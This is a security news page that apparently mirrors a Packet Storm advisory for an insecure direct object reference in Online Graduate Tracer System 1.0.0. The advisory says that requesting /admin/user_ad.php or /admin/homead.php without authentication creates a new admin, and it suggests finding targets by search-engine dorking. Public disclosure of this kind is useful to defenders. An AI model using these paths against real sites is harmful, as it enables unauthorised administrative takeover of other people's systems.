Security
Headlines
HeadlinesLatestCVEs

Headline

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

Packet Storm
Open in Source
#sql#xss#csrf#vulnerability#web#ios#mac#windows#apple#google#ubuntu#linux#debian#cisco#java#php#perl#acer#auth#ruby#firefox

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

=============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

File Tags

  • ActiveX (933)
  • Advisory (86,590)
  • Arbitrary (16,908)
  • BBS (2,859)
  • Bypass (1,880)
  • CGI (1,034)
  • Code Execution (7,844)
  • Conference (691)
  • Cracker (844)
  • CSRF (3,413)
  • DoS (25,127)
  • Encryption (2,389)
  • Exploit (53,324)
  • File Inclusion (4,266)
  • File Upload (1,001)
  • Firewall (822)
  • Info Disclosure (2,893)
  • Intrusion Detection (916)
  • Java (3,144)
  • JavaScript (899)
  • Kernel (7,244)
  • Local (14,809)
  • Magazine (587)
  • Overflow (13,180)
  • Perl (1,435)
  • PHP (5,228)
  • Proof of Concept (2,397)
  • Protocol (3,733)
  • Python (1,649)
  • Remote (31,707)
  • Root (3,639)
  • Rootkit (529)
  • Ruby (632)
  • Scanner (1,657)
  • Security Tool (8,033)
  • Shell (3,282)
  • Shellcode (1,217)
  • Sniffer (903)
  • Spoof (2,279)
  • SQL Injection (16,630)
  • TCP (2,444)
  • Trojan (690)
  • UDP (904)
  • Virus (670)
  • Vulnerability (33,027)
  • Web (9,974)
  • Whitepaper (3,782)
  • x86 (967)
  • XSS (18,270)
  • Other

File Archives

  • August 2024
  • July 2024
  • June 2024
  • May 2024
  • April 2024
  • March 2024
  • February 2024
  • January 2024
  • December 2023
  • November 2023
  • October 2023
  • September 2023
  • Older

Systems

  • AIX (429)
  • Apple (2,099)
  • BSD (377)
  • CentOS (58)
  • Cisco (1,927)
  • Debian (7,110)
  • Fedora (1,693)
  • FreeBSD (1,246)
  • Gentoo (4,567)
  • HPUX (880)
  • iOS (378)
  • iPhone (108)
  • IRIX (220)
  • Juniper (69)
  • Linux (50,941)
  • Mac OS X (691)
  • Mandriva (3,105)
  • NetBSD (256)
  • OpenBSD (489)
  • RedHat (16,657)
  • Slackware (941)
  • Solaris (1,611)
  • SUSE (1,444)
  • Ubuntu (9,783)
  • UNIX (9,443)
  • UnixWare (187)
  • Windows (6,679)
  • Other

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution
Packet Storm